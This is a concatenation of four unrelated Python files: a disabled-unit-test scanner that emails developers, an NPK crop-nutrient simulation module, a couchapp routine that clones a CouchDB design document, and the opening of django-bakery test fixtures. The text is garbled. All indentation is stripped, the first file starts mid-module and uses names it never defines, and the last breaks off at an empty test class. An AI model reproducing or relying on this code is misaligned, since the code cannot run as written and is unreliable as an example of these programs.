NON_RECURSING_FOLDERS_PAT = re.compile(r'(.svn|ext(js)?|boost|.metadata|buildtools|Debug|Release|psa-htdocs|sample-data|data|build|Archive|Dist|Install|bin|lib)$')
FROM = 'Disabled Unit Test Scanner <code.scan@example.com>' ## TODO make configurable
DISABLED_JAVA_PAT = re.compile('^\s*//\s*@Test', re.MULTILINE | re.DOTALL)
parser = optparse.OptionParser('Usage: %prog [options] [path]\n\nCheck for disabled unit tests; optionally nag developers to fix them.')
parser.add_option('--nag', dest="nag", action="store_true", help="Emit emails nagging people to fix disabled tests.")
xmail.addMailOptions(parser, to=False)
def getUnique(items):
uniques = {}
for x in items:
uniques[x] = 1
return uniques.keys()[:]
def getAddressList(txt):
items = []
if txt:
txt = txt.replace(';', ',')
items = [x.strip() for x in txt.split(',') if x.strip()]
items = getUnique(items)
items.sort()
return items
def getRawAddress(address):
i = address.find('<')
if i > -1:
j = address.find('>', i)
if j == -1:
return address[i + 1:].strip()
return address[i + 1:j].strip()
return address.strip()
def nag(dt, msg, options):
if dt.owner or options.cc:
fname = os.path.basename(dt.path)
subject = 'disabled unit test near %s, line %d' % (fname, dt.lineNum)
msg = ('''You are one of the people responsible for re-enabling this test. Please
get the test working, re-enable it, remove the comment that flags it as
disabled, and mark ticket #%s fixed. The sooner you can do this, the better.
Until the test is re-enabled, an important signal about the integrity of our
code is being suppressed with each build+test cycle.
''' % dt.ticket) + msg
xmail.sendmail(msg, to=dt.owner, sender=FROM, subject=subject, options=options)
else:
sys.stderr.write('%s(%d): Error: disabled unit test but nobody can be nagged!\n', dt.path, dt.lineNum)
_CPP_TESTNAME_PAT = re.compile(r'^\s*(SIMPLE_TEST\s*\(\s*(.*?)\s*\)|class\s+([a-zA-Z_0-9]+)\s*:\s*(public|protected|private)\s+[a-zA-Z_0-9]+Test)', re.MULTILINE | re.DOTALL)
_JAVA_TESTNAME_PAT = re.compile(r'^\s*public\s+void\s+([a-zA-Z_0-9]+)\s*\(', re.MULTILINE | re.DOTALL)
def _extractTestNameFromMatch(m, java):
if java:
return m.group(1)
elif m.group(1).find('SIMPLE_TEST') > -1:
return m.group(2)
else:
return m.group(3)
def getNameOfNextTestMethod(path, txt, offset):
i = min(len(txt), offset + 500)
nextFewLines = txt[offset:i]
java = path.endswith('.java')
if java:
testnamePat = _JAVA_TESTNAME_PAT
else:
testnamePat = _CPP_TESTNAME_PAT
m = testnamePat.search(nextFewLines)
if m:
return _extractTestNameFromMatch(m, java)
_ALL_OR_ENTIRE_PAT = re.compile('(^|\s+)(all($|\s+)|entire\s+)', re.IGNORECASE)
def disabledTestIsProperlyDocumented(testName, disabledTests):
if not testName:
return False
testName = testName.lower()
for dut in disabledTests:
if _ALL_OR_ENTIRE_PAT.search(dut.which):
return True
regex = re.compile(r'\b%s\b' % testName, re.IGNORECASE)
if regex.search(dut.which):
return True
return False
def checkFile(fpath):
#print('checking %s' % fpath)
disabledTests = []
txt = read_file(fpath)
# First, look through for tests that are disabled in the way we expect.
standardDisableCount = 0
for match in DISABLED_PAT.finditer(txt):
disabledTests.append(DisabledUnitTest(fpath, txt, match.start(), match.end()))
standardDisableCount += 1
improper = []
java = bool(fpath.endswith('.java'))
# Now, scan through the file looking for stuff that's maybe disabled in the wrong way.
# We do this so that over time, everyone who's working in the codebase converges on
# the same best practices, instead of circumventing the system.
if java:
# In java, look for //@Test where we can't tie the associated method to a
# standard comment about being disabled.
for match in DISABLED_JAVA_PAT.finditer(txt):
name = getNameOfNextTestMethod(fpath, txt, match.start())
if not disabledTestIsProperlyDocumented(name, disabledTests):
tuple = (name, 1 + codescan.getLineNumForOffset(txt, match.start()))
improper.append(tuple)
nextInactiveBlock = codescan.getNextInactiveJavaBlock
testnamePat = _JAVA_TESTNAME_PAT
elif fpath.endswith('.cpp') or fpath.endswith('.h'):
nextInactiveBlock = codescan.getNextInactiveCppBlock
testnamePat = _CPP_TESTNAME_PAT
else:
nextInactiveBlock = _findNoInactiveBlocks
testnamePat = None
# In both java and C++, look for methods that have been completely commented
# out. In C++, also check for methods that have been #ifdef'ed out.'
i = 0
while testnamePat:
range = nextInactiveBlock(txt, i)
if not range:
break
block = txt[range[0]:range[1]]
for match in testnamePat.finditer(block):
name = _extractTestNameFromMatch(match, java)
if not disabledTestIsProperlyDocumented(name, disabledTests):
lineNum = 1 + codescan.getLineNumForOffset(txt, range[0] + match.start())
tuple = (name, lineNum)
improper.append(tuple)
i = range[1]
return disabledTests, improper
def _findNoInactiveBlocks(x, y):
return -1, -1
class TestFolderOnlyRecurser:
def select(self, folder, dirs):
# We're removing items from dirs rather than simply resetting it,
# because we have to modify the object *in place* in order to
# prevent recursion.
test_folder = None
if 'test' in dirs:
test_folder = 'test'
elif 'Test' in dirs:
test_folder = 'Test'
if test_folder:
i = len(dirs) - 1
while i > -1:
d = dirs[i]
if d != test_folder:
dirs.remove(d)
i -= 1
#print('setting recursable folders under %s to %s' % (folder, str(dirs)))
return dirs
class TestCheckVisitor:
def __init__(self):
self.disabledTests = []
self.improperCount = 0
self.improperSummary = ''
def visit(self, folder, item, relativePath):
#print('visited %s' % item)
# If we're in a test folder, or anywhere below it...
if folder.lower().find('/test/') > -1:
disabledTestsInThisFile, improper = checkFile(folder + item)
if disabledTestsInThisFile:
self.disabledTests.extend(disabledTestsInThisFile)
if improper:
self.improperCount += len(improper)
for tuple in improper:
self.improperSummary += '%s(%d): Warning: disabled unit test %s seems improperly documented.\n' % (relativePath + item, tuple[1], tuple[0])
info = svnwrap.Info(folder + item)
self.improperSummary += ' Last changed revision: %s\n' % info.lastChangedRev
self.improperSummary += ' Last changed by: %s\n' % info.lastChangedAuthor
self.improperSummary += ' Last changed date: %s\n' % info.lastChangedDate
self.improperSummary += '\n'
def check(path, options):
if not os.path.isdir(path):
sys.stderr.write('%s is not a valid folder.\n' % path)
return 1
path = norm_folder(path)
print('Checking for disabled unit tests in %s...\n' % path)
visitor = TestCheckVisitor()
checkedFiles, checkedFolders = metadata.visit(path, visitor)
rootLen = len(path)
if visitor.improperSummary:
print(visitor.improperSummary)
shouldNag = xmail.hasDest(options) or xmail.hasHostInfo(options)
for dt in visitor.disabledTests:
txt = '%s(%d): Warning: disabled unit test.\n' % (dt.path[rootLen:], dt.lineNum)
txt += ' ' + str(dt).replace('\n', '\n ')
print(txt + '\n')
if visitor.improperSummary:
txt += '\n\nIn addition, %d unit tests appear to be disabled but improperly documented.\n' % visitor.improperCount
txt += 'Please consider fixing these as well:\n\n'
txt += visitor.improperSummary
if shouldNag:
nag(dt, txt, options)
print('Checked %d files in %d folders.\n Found %d correctly disabled tests.\n Found %d tests that seem to be disabled but not documented.' % (checkedFiles, checkedFolders, len(visitor.disabledTests), visitor.improperCount))
if __name__ == '__main__':
( options, args ) = parser.parse_args()
if args:
folder = args[0]
else:
folder = sandbox.current.get_test_root()
exitCode = check(folder, options)
sys.exit(exitCode)
| |
#!/usr/bin/env python
from .. import exceptions as exc
from ..traitlets import Float, Int, Instance, AfgenTrait
from ..decorators import prepare_rates, prepare_states
from ..base_classes import ParamTemplate, StatesTemplate, RatesTemplate, \
SimulationObject
from .nutrients import NPK_Translocation
from .nutrients import NPK_Demand_Uptake
class NPK_Crop_Dynamics(SimulationObject):
"""Implementation of overall NPK crop dynamics.
NPK_Crop_Dynamics implements the overall logic of N/P/K book-keeping within the
crop.
**Simulation parameters**
=========== ================================================ ======= ======================
Name Description Type Unit
=========== ================================================ ======= ======================
DVS_NPK_STOP DVS above which no crop N-P-K uptake occurs SCr -
NMAXLV_TB Maximum N concentration in leaves as TCr kg N kg-1 dry biomass
function of dvs
PMAXLV_TB As for P TCr kg P kg-1 dry biomass
KMAXLV_TB As for K TCr kg K kg-1 dry biomass
NMAXRT_FR Maximum N concentration in roots as fraction SCr -
of maximum N concentration in leaves
PMAXRT_FR As for P SCr -
KMAXRT_FR As for K SCr -
NMAXST_FR Maximum N concentration in stems as fraction SCr -
of maximum N concentration in leaves
KMAXST_FR As for K SCr -
PMAXST_FR As for P SCr -
NRESIDLV Residual N fraction in leaves SCr kg N kg-1 dry biomass
PRESIDLV Residual P fraction in leaves SCr kg P kg-1 dry biomass
KRESIDLV Residual K fraction in leaves SCr kg K kg-1 dry biomass
NRESIDRT Residual N fraction in roots SCr kg N kg-1 dry biomass
PRESIDRT Residual P fraction in roots SCr kg P kg-1 dry biomass
KRESIDRT Residual K fraction in roots SCr kg K kg-1 dry biomass
NRESIDST Residual N fraction in stems SCr kg N kg-1 dry biomass
PRESIDST Residual P fraction in stems SCr kg P kg-1 dry biomass
KRESIDST Residual K fraction in stems SCr kg K kg-1 dry biomass
=========== ================================================ ======= ======================
**State variables**
======= ================================================= ==== ============
Name Description Pbl Unit
======= ================================================= ==== ============
ANLV Actual N amount in living leaves Y |kg N ha-1|
APLV Actual P amount in living leaves Y |kg P ha-1|
AKLV Actual K amount in living leaves Y |kg K ha-1|
ANST Actual N amount in living stems Y |kg N ha-1|
APST Actual P amount in living stems Y |kg P ha-1|
AKST Actual K amount in living stems Y |kg K ha-1|
ANSO Actual N amount in living storage organs Y |kg N ha-1|
APSO Actual P amount in living storage organs Y |kg P ha-1|
AKSO Actual K amount in living storage organs Y |kg K ha-1|
ANRT Actual N amount in living roots Y |kg N ha-1|
APRT Actual P amount in living roots Y |kg P ha-1|
AKRT Actual K amount in living roots Y |kg K ha-1|
NUPTAKE_T total absorbed N amount N |kg N ha-1|
PUPTAKE_T total absorbed P amount N |kg P ha-1|
KUPTAKE_T total absorbed K amount N |kg K ha-1|
NFIX_T total biological fixated N amount N |kg N ha-1|
======= ================================================= ==== ============
**Rate variables**
======= ================================================= ==== ============
Name Description Pbl Unit
======= ================================================= ==== ============
RNLV Weight increase (N) in leaves N |kg ha-1 d-1|
RPLV Weight increase (P) in leaves N |kg ha-1 d-1|
RKLV Weight increase (K) in leaves N |kg ha-1 d-1|
RNST Weight increase (N) in stems N |kg ha-1 d-1|
RPST Weight increase (P) in stems N |kg ha-1 d-1|
RKST Weight increase (K) in stems N |kg ha-1 d-1|
RNRT Weight increase (N) in roots N |kg ha-1 d-1|
RPRT Weight increase (P) in roots N |kg ha-1 d-1|
RKRT Weight increase (K) in roots N |kg ha-1 d-1|
RNSO Weight increase (N) in storage organs N |kg ha-1 d-1|
RPSO Weight increase (P) in storage organs N |kg ha-1 d-1|
RKSO Weight increase (K) in storage organs N |kg ha-1 d-1|
RNDLV Rate of N loss in leaves N |kg ha-1 d-1|
RPDLV as for P N |kg ha-1 d-1|
RKDLV as for K N |kg ha-1 d-1|
RNDST Rate of N loss in roots N |kg ha-1 d-1|
RPDST as for P N |kg ha-1 d-1|
RKDST as for K N |kg ha-1 d-1|
RNDRT Rate of N loss in stems N |kg ha-1 d-1|
RPDRT as for P N |kg ha-1 d-1|
RKDRT as for K N |kg ha-1 d-1|
RNLOSS N loss due to senescence N |kg ha-1 d-1|
RPLOSS P loss due to senescence N |kg ha-1 d-1|
RKLOSS K loss due to senescence N |kg ha-1 d-1|
======= ================================================= ==== ============
**Signals send or handled**
None
**External dependencies**
======= =================================== ==================== ============
Name Description Provided by Unit
======= =================================== ==================== ============
DVS Crop development stage DVS_Phenology -
WLV Dry weight of living leaves WOFOST_Leaf_Dynamics |kg ha-1|
WRT Dry weight of living roots WOFOST_Root_Dynamics |kg ha-1|
WST Dry weight of living stems WOFOST_Stem_Dynamics |kg ha-1|
DRLV Death rate of leaves WOFOST_Leaf_Dynamics |kg ha-1 d-|
DRRT Death rate of roots WOFOST_Root_Dynamics |kg ha-1 d-|
DRST Death rate of stems WOFOST_Stem_Dynamics |kg ha-1 d-|
======= =================================== ==================== ============
"""
translocation = Instance(SimulationObject)
demand_uptake = Instance(SimulationObject)
ANLVI = Float(-99.) # initial soil N amount in leaves
ANSTI = Float(-99.) # initial soil N amount in stems
ANRTI = Float(-99.) # initial soil N amount in roots
ANSOI = Float(-99.) # initial soil N amount in storage organs
APLVI = Float(-99.) # initial soil P amount in leaves
APSTI = Float(-99.) # initial soil P amount in stems
APRTI = Float(-99.) # initial soil P amount in roots
APSOI = Float(-99.) # initial soil P amount in storage organs
AKLVI = Float(-99.) # initial soil K amount in leaves
AKSTI = Float(-99.) # initial soil K amount in stems
AKRTI = Float(-99.) # initial soil K amount in roots
AKSOI = Float(-99.) # initial soil K amount in storage organs
class Parameters(ParamTemplate):
DVS_NPK_STOP = Float(-99.)
NMAXLV_TB = AfgenTrait()
PMAXLV_TB = AfgenTrait()
KMAXLV_TB = AfgenTrait()
NMAXST_FR = Float(-99.)
NMAXRT_FR = Float(-99.)
PMAXST_FR = Float(-99.)
PMAXRT_FR = Float(-99.)
KMAXST_FR = Float(-99.)
KMAXRT_FR = Float(-99.)
NRESIDLV = Float(-99.) # residual N fraction in leaves [kg N kg-1 dry biomass]
NRESIDST = Float(-99.) # residual N fraction in stems [kg N kg-1 dry biomass]
NRESIDRT = Float(-99.) # residual N fraction in roots [kg N kg-1 dry biomass]
PRESIDLV = Float(-99.) # residual P fraction in leaves [kg P kg-1 dry biomass]
PRESIDST = Float(-99.) # residual P fraction in stems [kg P kg-1 dry biomass]
PRESIDRT = Float(-99.) # residual P fraction in roots [kg P kg-1 dry biomass]
KRESIDLV = Float(-99.) # residual K fraction in leaves [kg K kg-1 dry biomass]
KRESIDST = Float(-99.) # residual K fraction in stems [kg K kg-1 dry biomass]
KRESIDRT = Float(-99.) # residual K fraction in roots [kg K kg-1 dry biomass]
class StateVariables(StatesTemplate):
ANLV = Float(-99.) # N amount in leaves [kg N ha-1]
APLV = Float(-99.) # P amount in leaves [kg P ]
AKLV = Float(-99.) # K amount in leaves [kg K ]
ANST = Float(-99.) # N amount in stems [kg N ]
APST = Float(-99.) # P amount in stems [kg P ]
AKST = Float(-99.) # K amount in stems [kg K ]
ANSO = Float(-99.) # N amount in storage organs [kg N ]
APSO = Float(-99.) # P amount in storage organs [kg P ]
AKSO = Float(-99.) # K amount in storage organs [kg K ]
ANRT = Float(-99.) # N amount in roots [kg N ]
APRT = Float(-99.) # P amount in roots [kg P ]
AKRT = Float(-99.) # K amount in roots [kg K ]
NUPTAKE_T = Float(-99.) # total absorbed N amount [kg N ]
PUPTAKE_T = Float(-99.) # total absorbed P amount [kg P ]
KUPTAKE_T = Float(-99.) # total absorbed K amount [kg K ]
NFIX_T = Float(-99.) # total biological fixated N amount [kg N ]
NLOSSES_T = Float(-99.)
PLOSSES_T = Float(-99.)
KLOSSES_T = Float(-99.)
class RateVariables(RatesTemplate):
RNLV = Float(-99.) # Net rates of NPK in different plant organs
RPLV = Float(-99.)
RKLV = Float(-99.)
RNST = Float(-99.)
RPST = Float(-99.)
RKST = Float(-99.)
RNRT = Float(-99.)
RPRT = Float(-99.)
RKRT = Float(-99.)
RNSO = Float(-99.)
RPSO = Float(-99.)
RKSO = Float(-99.)
RNDLV = Float(-99.) # N loss rate leaves [kg ha-1 d-1]
RNDST = Float(-99.) # N loss rate stems [kg ha-1 d-1]
RNDRT = Float(-99.) # N loss rate roots [kg ha-1 d-1]
RPDLV = Float(-99.) # P loss rate leaves [kg ha-1 d-1]
RPDST = Float(-99.) # P loss rate stems [kg ha-1 d-1]
RPDRT = Float(-99.) # P loss rate roots [kg ha-1 d-1]
RKDLV = Float(-99.) # K loss rate leaves [kg ha-1 d-1]
RKDST = Float(-99.) # K loss rate stems [kg ha-1 d-1]
RKDRT = Float(-99.) # K loss rate roots [kg ha-1 d-1]
RNLOSS = Float(-99.)
RPLOSS = Float(-99.)
RKLOSS = Float(-99.)
def initialize(self, day, kiosk, parvalues):
"""
:param kiosk: variable kiosk of this PCSE instance
:param parvalues: dictionary with parameters as key/value pairs
"""
self.params = self.Parameters(parvalues)
self.rates = self.RateVariables(kiosk)
self.kiosk = kiosk
# Initialize components of the npk_crop_dynamics
self.translocation = NPK_Translocation(day, kiosk, parvalues)
self.demand_uptake = NPK_Demand_Uptake(day, kiosk, parvalues)
# INITIAL STATES
params = self.params
DVS = self.kiosk["DVS"]
WLV = self.kiosk["WLV"]
WST = self.kiosk["WST"]
WRT = self.kiosk["WRT"]
# Initial amounts
self.ANLVI = ANLV = WLV * params.NMAXLV_TB(DVS)
self.ANSTI = ANST = WST * params.NMAXLV_TB(DVS) * params.NMAXST_FR
self.ANRTI = ANRT = WRT * params.NMAXLV_TB(DVS) * params.NMAXRT_FR
self.ANSOI = ANSO = 0.
self.APLVI = APLV = WLV * params.PMAXLV_TB(DVS)
self.APSTI = APST = WST * params.PMAXLV_TB(DVS) * params.PMAXST_FR
self.APRTI = APRT = WRT * params.PMAXLV_TB(DVS) * params.PMAXRT_FR
self.APSOI = APSO = 0.
self.AKLVI = AKLV = WLV * params.KMAXLV_TB(DVS)
self.AKSTI = AKST = WST * params.KMAXLV_TB(DVS) * params.KMAXST_FR
self.AKRTI = AKRT = WRT * params.KMAXLV_TB(DVS) * params.KMAXRT_FR
self.AKSOI = AKSO = 0.
self.states = self.StateVariables(kiosk,
publish=["ANLV", "ANST", "ANRT", "ANSO", "APLV", "APST",
"APRT", "APSO", "AKLV", "AKST", "AKRT", "AKSO"],
ANLV=ANLV, ANST=ANST, ANRT=ANRT, ANSO=ANSO,
APLV=APLV, APST=APST, APRT=APRT, APSO=APSO,
AKLV=AKLV, AKST=AKST, AKRT=AKRT, AKSO=AKSO,
NUPTAKE_T=0, PUPTAKE_T=0., KUPTAKE_T=0., NFIX_T=0.,
NLOSSES_T=0, PLOSSES_T=0., KLOSSES_T=0.)
@prepare_rates
def calc_rates(self, day, drv):
rates = self.rates
params = self.params
self.demand_uptake.calc_rates(day, drv)
self.translocation.calc_rates(day, drv)
# Compute loss of NPK due to death of plant material
DRLV = self.kiosk["DRLV"] # death rate leaves [kg dry matter ha-1 d-1]
DRST = self.kiosk["DRST"] # death rate stems [kg dry matter ha-1 d-1]
DRRT = self.kiosk["DRRT"] # death rate roots [kg dry matter ha-1 d-1]
rates.RNDLV = params.NRESIDLV * DRLV
rates.RNDST = params.NRESIDST * DRST
rates.RNDRT = params.NRESIDRT * DRRT
rates.RPDLV = params.PRESIDLV * DRLV
rates.RPDST = params.PRESIDST * DRST
rates.RPDRT = params.PRESIDRT * DRRT
rates.RKDLV = params.KRESIDLV * DRLV
rates.RKDST = params.KRESIDST * DRST
rates.RKDRT = params.KRESIDRT * DRRT
# N rates in leaves, stems, root and storage organs computed as
# uptake - translocation - death.
# except for storage organs which only take up as a result of translocation.
rates.RNLV = self.kiosk["RNULV"] - self.kiosk["RNTLV"] - rates.RNDLV
rates.RNST = self.kiosk["RNUST"] - self.kiosk["RNTST"] - rates.RNDST
rates.RNRT = self.kiosk["RNURT"] - self.kiosk["RNTRT"] - rates.RNDRT
rates.RNSO = self.kiosk["RNUSO"]
# P rates in leaves, stems, root and storage organs
rates.RPLV = self.kiosk["RPULV"] - self.kiosk["RPTLV"] - rates.RPDLV
rates.RPST = self.kiosk["RPUST"] - self.kiosk["RPTST"] - rates.RPDST
rates.RPRT = self.kiosk["RPURT"] - self.kiosk["RPTRT"] - rates.RPDRT
rates.RPSO = self.kiosk["RPUSO"]
# K rates in leaves, stems, root and storage organs
rates.RKLV = self.kiosk["RKULV"] - self.kiosk["RKTLV"] - rates.RKDLV
rates.RKST = self.kiosk["RKUST"] - self.kiosk["RKTST"] - rates.RKDST
rates.RKRT = self.kiosk["RKURT"] - self.kiosk["RKTRT"] - rates.RKDRT
rates.RKSO = self.kiosk["RKUSO"]
rates.RNLOSS = rates.RNDLV + rates.RNDST + rates.RNDRT
rates.RPLOSS = rates.RPDLV + rates.RPDST + rates.RPDRT
rates.RKLOSS = rates.RKDLV + rates.RKDST + rates.RKDRT
self._check_N_balance(day)
self._check_P_balance(day)
self._check_K_balance(day)
@prepare_states
def integrate(self, day, delt=1.0):
rates = self.rates
states = self.states
# N amount in leaves, stems, root and storage organs
states.ANLV += rates.RNLV
states.ANST += rates.RNST
states.ANRT += rates.RNRT
states.ANSO += rates.RNSO
# P amount in leaves, stems, root and storage organs
states.APLV += rates.RPLV
states.APST += rates.RPST
states.APRT += rates.RPRT
states.APSO += rates.RPSO
# K amount in leaves, stems, root and storage organs
states.AKLV += rates.RKLV
states.AKST += rates.RKST
states.AKRT += rates.RKRT
states.AKSO += rates.RKSO
self.translocation.integrate(day, delt)
self.demand_uptake.integrate(day, delt)
# total NPK uptake from soil
states.NUPTAKE_T += self.kiosk["RNUPTAKE"]
states.PUPTAKE_T += self.kiosk["RPUPTAKE"]
states.KUPTAKE_T += self.kiosk["RKUPTAKE"]
states.NFIX_T += self.kiosk["RNFIX"]
states.NLOSSES_T += rates.RNLOSS
states.PLOSSES_T += rates.RPLOSS
states.KLOSSES_T += rates.RKLOSS
def _check_N_balance(self, day):
states = self.states
NUPTAKE_T = states.NUPTAKE_T
NFIX_T = states.NFIX_T
ANLVI = self.ANLVI
ANSTI = self.ANSTI
ANRTI = self.ANRTI
ANSOI = self.ANSOI
ANLV = states.ANLV
ANST = states.ANST
ANRT = states.ANRT
ANSO = states.ANSO
NLOSST = states.NLOSSES_T
checksum = abs(NUPTAKE_T + NFIX_T + (ANLVI + ANSTI + ANRTI + ANSOI) -
(ANLV + ANST + ANRT + ANSO + NLOSST))
if abs(checksum) >= 1.:
msg = "N flows not balanced on day %s\n" % day
msg += "Checksum: %f, NUPTAKE_T: %f, NFIX_T: %f\n" % (checksum, NUPTAKE_T, NFIX_T)
msg += "ANLVI: %f, ANSTI: %f, ANRTI: %f, ANSOI: %f\n" %(ANLVI, ANSTI, ANRTI, ANSOI)
msg += "ANLV: %f, ANST: %f, ANRT: %f, ANSO: %f\n" % (ANLV, ANST, ANRT, ANSO)
msg += "NLOSST: %f\n" %(NLOSST)
raise exc.NutrientBalanceError(msg)
def _check_P_balance(self, day):
states = self.states
PUPTAKE_T = states.PUPTAKE_T
APLVI = self.APLVI
APSTI = self.APSTI
APRTI = self.APRTI
APSOI = self.APSOI
APLV = states.APLV
APST = states.APST
APRT = states.APRT
APSO = states.APSO
PLOSST = states.PLOSSES_T
checksum = abs(PUPTAKE_T + (APLVI + APSTI + APRTI + APSOI) -
(APLV + APST + APRT + APSO + PLOSST))
if abs(checksum) >= 1.:
msg = "P flows not balanced on day %s\n" % day
msg += "Checksum: %f, PUPTAKE_T: %f\n" % (checksum, PUPTAKE_T)
msg += "APLVI: %f, APSTI: %f, APRTI: %f, APSOI: %f\n" % (APLVI, APSTI, APRTI, APSOI)
msg += "APLV: %f, APST: %f, APRT: %f, APSO: %f\n" % (APLV, APST, APRT, APSO)
msg += "PLOSST: %f\n" %(PLOSST)
raise exc.NutrientBalanceError(msg)
def _check_K_balance(self, day):
states = self.states
KUPTAKE_T = states.KUPTAKE_T
AKLVI = self.AKLVI
AKSTI = self.AKSTI
AKRTI = self.AKRTI
AKSOI = self.AKSOI
AKLV = states.AKLV
AKST = states.AKST
AKRT = states.AKRT
AKSO = states.AKSO
KLOSST = states.KLOSSES_T
checksum = abs(KUPTAKE_T + (AKLVI + AKSTI + AKRTI + AKSOI) -
(AKLV + AKST + AKRT + AKSO + KLOSST))
if abs(checksum) >= 1.:
msg = "K flows not balanced on day %s\n" % day
msg += "Checksum: %f, KUPTAKE_T: %f\n" %(checksum, KUPTAKE_T)
msg += "AKLVI: %f, AKSTI: %f, AKRTI: %f, AKSOI: %f\n" % (AKLVI, AKSTI, AKRTI, AKSOI)
msg += "AKLV: %f, AKST: %f, AKRT: %f, AKSO: %f\n" % (AKLV, AKST, AKRT, AKSO)
msg += "KLOSST: %f\n" %(KLOSST)
raise exc.NutrientBalanceError(msg)
| |
# -*- coding: utf-8 -*-
#
# This file is part of couchapp released under the Apache 2 license.
# See the NOTICE for more information.
from __future__ import with_statement
import base64
import copy
from hashlib import md5
import logging
import os
import os.path
from couchapp.errors import AppError
from couchapp import client
from couchapp import util
logger = logging.getLogger(__name__)
if os.name == 'nt':
def _replace_slash(name):
return name.replace("/", "\\")
else:
def _replace_slash(name):
return name
def clone(source, dest=None, rev=None):
"""
Clone an application from a design_doc given.
:attr design_doc: dict, the design doc retrieved from couchdb
if something was wrong.
"""
try:
dburl, docid = source.split('_design/')
except ValueError:
raise AppError("%s isn't a valid source" % source)
if not dest:
dest = docid
path = os.path.normpath(os.path.join(os.getcwd(), dest))
if not os.path.exists(path):
os.makedirs(path)
db = client.Database(dburl[:-1], create=False)
if not rev:
doc = db.open_doc("_design/%s" % docid)
else:
doc = db.open_doc("_design/%s" % docid, rev=rev)
docid = doc['_id']
metadata = doc.get('couchapp', {})
# get manifest
manifest = metadata.get('manifest', {})
# get signatures
signatures = metadata.get('signatures', {})
# get objects refs
objects = metadata.get('objects', {})
# create files from manifest
if manifest:
for filename in manifest:
logger.debug("clone property: %s" % filename)
filepath = os.path.join(path, filename)
if filename.endswith('/'):
if not os.path.isdir(filepath):
os.makedirs(filepath)
elif filename == "couchapp.json":
continue
else:
parts = util.split_path(filename)
fname = parts.pop()
v = doc
while 1:
try:
for key in parts:
v = v[key]
except KeyError:
break
# remove extension
last_key, ext = os.path.splitext(fname)
# make sure key exist
try:
content = v[last_key]
except KeyError:
break
if isinstance(content, basestring):
_ref = md5(util.to_bytestring(content)).hexdigest()
if objects and _ref in objects:
content = objects[_ref]
if content.startswith('base64-encoded;'):
content = base64.b64decode(content[15:])
if fname.endswith('.json'):
content = util.json.dumps(content).encode('utf-8')
del v[last_key]
# make sure file dir have been created
filedir = os.path.dirname(filepath)
if not os.path.isdir(filedir):
os.makedirs(filedir)
util.write(filepath, content)
# remove the key from design doc
temp = doc
for key2 in parts:
if key2 == key:
if not temp[key2]:
del temp[key2]
break
temp = temp[key2]
# second pass for missing key or in case
# manifest isn't in app
for key in doc.iterkeys():
if key.startswith('_'):
continue
elif key in ('couchapp'):
app_meta = copy.deepcopy(doc['couchapp'])
if 'signatures' in app_meta:
del app_meta['signatures']
if 'manifest' in app_meta:
del app_meta['manifest']
if 'objects' in app_meta:
del app_meta['objects']
if 'length' in app_meta:
del app_meta['length']
if app_meta:
couchapp_file = os.path.join(path, 'couchapp.json')
util.write_json(couchapp_file, app_meta)
elif key in ('views'):
vs_dir = os.path.join(path, key)
if not os.path.isdir(vs_dir):
os.makedirs(vs_dir)
for vsname, vs_item in doc[key].iteritems():
vs_item_dir = os.path.join(vs_dir, vsname)
if not os.path.isdir(vs_item_dir):
os.makedirs(vs_item_dir)
for func_name, func in vs_item.iteritems():
filename = os.path.join(vs_item_dir, '%s.js' %
func_name)
util.write(filename, func)
logger.warning("clone view not in manifest: %s" % filename)
elif key in ('shows', 'lists', 'filter', 'update'):
showpath = os.path.join(path, key)
if not os.path.isdir(showpath):
os.makedirs(showpath)
for func_name, func in doc[key].iteritems():
filename = os.path.join(showpath, '%s.js' %
func_name)
util.write(filename, func)
logger.warning(
"clone show or list not in manifest: %s" % filename)
else:
filedir = os.path.join(path, key)
if os.path.exists(filedir):
continue
else:
logger.warning("clone property not in manifest: %s" % key)
if isinstance(doc[key], (list, tuple,)):
util.write_json(filedir + ".json", doc[key])
elif isinstance(doc[key], dict):
if not os.path.isdir(filedir):
os.makedirs(filedir)
for field, value in doc[key].iteritems():
fieldpath = os.path.join(filedir, field)
if isinstance(value, basestring):
if value.startswith('base64-encoded;'):
value = base64.b64decode(content[15:])
util.write(fieldpath, value)
else:
util.write_json(fieldpath + '.json', value)
else:
value = doc[key]
if not isinstance(value, basestring):
value = str(value)
util.write(filedir, value)
# save id
idfile = os.path.join(path, '_id')
util.write(idfile, doc['_id'])
util.write_json(os.path.join(path, '.couchapprc'), {})
if '_attachments' in doc: # process attachments
attachdir = os.path.join(path, '_attachments')
if not os.path.isdir(attachdir):
os.makedirs(attachdir)
for filename in doc['_attachments'].iterkeys():
if filename.startswith('vendor'):
attach_parts = util.split_path(filename)
vendor_attachdir = os.path.join(path, attach_parts.pop(0),
attach_parts.pop(0), '_attachments')
filepath = os.path.join(vendor_attachdir, *attach_parts)
else:
filepath = os.path.join(attachdir, filename)
filepath = _replace_slash(filepath)
currentdir = os.path.dirname(filepath)
if not os.path.isdir(currentdir):
os.makedirs(currentdir)
if signatures.get(filename) != util.sign(filepath):
resp = db.fetch_attachment(docid, filename)
with open(filepath, 'wb') as f:
for chunk in resp.body_stream():
f.write(chunk)
logger.debug("clone attachment: %s" % filename)
logger.info("%s cloned in %s" % (source, dest))
| |
from __future__ import absolute_import
import os
import six
import sys
import boto
import json
import random
from .. import views, feeds
from django.db import models
from .. import static_views
from django.conf import settings
from .. import models as bmodels
from django.http import HttpResponse
from django.core.management import call_command
from django.test import TestCase, RequestFactory
from django.core.management.base import CommandError
from django.contrib.contenttypes.models import ContentType
class MockObject(bmodels.BuildableModel):
detail_views = ['bakery.tests.MockDetailView']
name = models.CharField(max_length=500)
def get_absolute_url(self):
super(MockObject, self).get_absolute_url() # Just for test coverage
return '/%s/' % self.id
class AutoMockObject(bmodels.AutoPublishingBuildableModel):
detail_views = ['bakery.tests.MockDetailView']
name = models.CharField(max_length=500)
is_published = models.BooleanField(default=False)
def get_absolute_url(self):
return '/%s/' % self.id
class MockDetailView(views.BuildableDetailView):
model = MockObject
template_name = 'detailview.html'
class MockRedirectView(views.BuildableRedirectView):
build_path = "detail/badurl.html"
url = "/detail/"
class MockRSSFeed(feeds.BuildableFeed):
link = '/latest.xml'
def items(self):
return MockObject.objects.all()
class JSONResponseMixin(object):
def render_to_response(self, context, **response_kwargs):
return HttpResponse(
self.convert_context_to_json(context),
content_type='application/json',
**response_kwargs
)
def convert_context_to_json(self, context):
return json.dumps(context)
class MockJSONView(JSONResponseMixin, views.BuildableTemplateView):
build_path = 'jsonview.json'
def get_content(self):
return self.get(self.request).content
def get_context_data(self, **kwargs):
return {'hello': 'tests'}
class BakeryTest(TestCase):
